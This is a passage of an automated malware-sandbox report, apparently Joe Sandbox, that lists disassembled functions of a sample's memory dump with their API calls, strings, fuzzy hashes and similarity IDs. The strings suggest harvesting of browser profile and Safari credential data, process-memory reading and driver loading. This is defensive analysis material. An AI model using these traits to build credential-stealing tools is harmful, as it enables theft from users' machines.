                                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                              • String ID:
                                                                                              • API String ID: 4218492932-0
                                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EmptyClipboard.USER32 ref: 00409882
                                                                                              • wcslen.MSVCRT ref: 0040988F
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                              • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                              • memcpy.MSVCRT ref: 004098B5
                                                                                              • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                              • CloseClipboard.USER32 ref: 004098D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2014503067-0
                                                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                              • String ID: OsError 0x%x (%u)
                                                                                              • API String ID: 403622227-2664311388
                                                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 1865533344-0
                                                                                              • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                              • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: NtdllProc_Window
                                                                                              • String ID:
                                                                                              • API String ID: 4255912815-0
                                                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                              • memset.MSVCRT ref: 0040265F
                                                                                              • memcpy.MSVCRT ref: 0040269B
                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                              • memcpy.MSVCRT ref: 004026FF
                                                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                              • API String ID: 577499730-1134094380
                                                                                              • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                              • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                              • String ID: :stringdata$ftp://$http://$https://
                                                                                              • API String ID: 2787044678-1921111777
                                                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                              • GetDC.USER32 ref: 004140E3
                                                                                              • wcslen.MSVCRT ref: 00414123
                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                              • _snwprintf.MSVCRT ref: 00414244
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                              • API String ID: 2080319088-3046471546
                                                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                              • memset.MSVCRT ref: 00413292
                                                                                              • memset.MSVCRT ref: 004132B4
                                                                                              • memset.MSVCRT ref: 004132CD
                                                                                              • memset.MSVCRT ref: 004132E1
                                                                                              • memset.MSVCRT ref: 004132FB
                                                                                              • memset.MSVCRT ref: 00413310
                                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                              • memset.MSVCRT ref: 004133C0
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                              • memcpy.MSVCRT ref: 004133FC
                                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                                              Strings
                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                              • {Unknown}, xrefs: 004132A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                              • API String ID: 4111938811-1819279800
                                                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                              • String ID:
                                                                                              • API String ID: 829165378-0
                                                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                              • memset.MSVCRT ref: 00404200
                                                                                              • memset.MSVCRT ref: 00404215
                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                              • API String ID: 2454223109-1580313836
                                                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                              • memcpy.MSVCRT ref: 004115C8
                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                              • API String ID: 4054529287-3175352466
                                                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                              • API String ID: 3143752011-1996832678
                                                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                              • API String ID: 667068680-2887671607
                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                              • API String ID: 1607361635-601624466
                                                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
